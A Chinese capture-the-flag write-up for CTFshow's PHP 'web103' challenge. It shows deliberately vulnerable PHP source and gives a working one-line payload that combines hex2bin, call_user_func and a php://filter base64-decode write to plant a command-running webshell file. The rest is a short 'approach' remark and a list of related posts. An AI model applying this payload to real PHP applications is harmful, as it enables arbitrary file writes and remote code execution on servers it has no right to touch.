CTFshow php特性 web103
目录
- 源码
- 思路
- 题解
- 总结
源码
<?php/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-23 21:03:24*/highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){$s = substr($v2,2);$str = call_user_func($v1,$s);echo $str;if(!preg_match("/.*p.*h.*p.*/i",$str)){file_put_contents($v3,$str);}else{die('Sorry');}
}
else{die('hacker');
}?>Notice: Undefined index: v1 in /var/www/html/index.php on line 14Notice: Undefined index: v2 in /var/www/html/index.php on line 15Notice: Undefined index: v3 in /var/www/html/index.php on line 16
hacker
思路
没什么影响
if(!preg_match("/.*p.*h.*p.*/i",$str)){file_put_contents($v3,$str);}
白嫖上一题
题解
v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php post: v1=hex2bin
总结
水题
CTFshow php特性 web103相关推荐
- ctfshow php特性 下
目录 web113 web114 web115 web123(php解析特性) web125 web126 web127(php解析特性) web128 web129 web130 web131 we ...
- ctfshow php特性(89——150plus)
web89 这题的逻辑是如果存在$_GET['num'],则用正则表达式匹配$num中的值,如果成功匹配则程序终止于"no no no",否则进行下一步,如果intval($num ...
- ctfshow php特性 web89-web115 web123-150wp
php特性 参考博客仍然是南神博客 文章目录 php特性 web89 web90 web91 web92 web93 web94 web95 web96 web97 web98 web99 web10 ...
- CTFshow php特性 web150plus
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web150
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web147
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web140
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web138
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
- CTFshow php特性 web137
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # ...
最新文章
- 迪杰斯特拉算法(C语言实现)
- 注塑机摆放间距多少合适_红木家具之间正确的摆放距离
- 对ie6、ie7、ff兼容性的详细css hack介绍
- Py之pydotplus:pydotplus的简介、安装、使用方法之详细攻略
- 8.Eclipse中创建Maven Web项目
- 《TCP/IP详解:卷1》之TCP/UDP总结
- 使用JWT实现单点登录(完全跨域方案)
- 单线程会导致死锁吗?
- bzoj1853: [Scoi2010]幸运数字 dp+容斥原理
- linux clone函数ptid,pthread_create到ret_fast_syscalls 参数和栈的变化
- 有效修改Tomcat6默认端口(ubuntu server,centos)
- js 控制 head 元素 隐藏与显示
- 最小二乘法2阶拟合数据
- python中symbol_理解和使用ES6中的Symbol
- json react 展示工具_如何基于jsoneditor二次封装一个可实时预览的json编辑器组件?(react版)...
- Android input touchpanel驱动流程
- 度量衡计算工具_度量衡计量单位换算转换器
- Python常见低级错误/拼写错误
- 机器学习实战(Machine Learning in Action)学习笔记————02.k-邻近算法(KNN)
- Confluence 文档协作平台安装部署笔记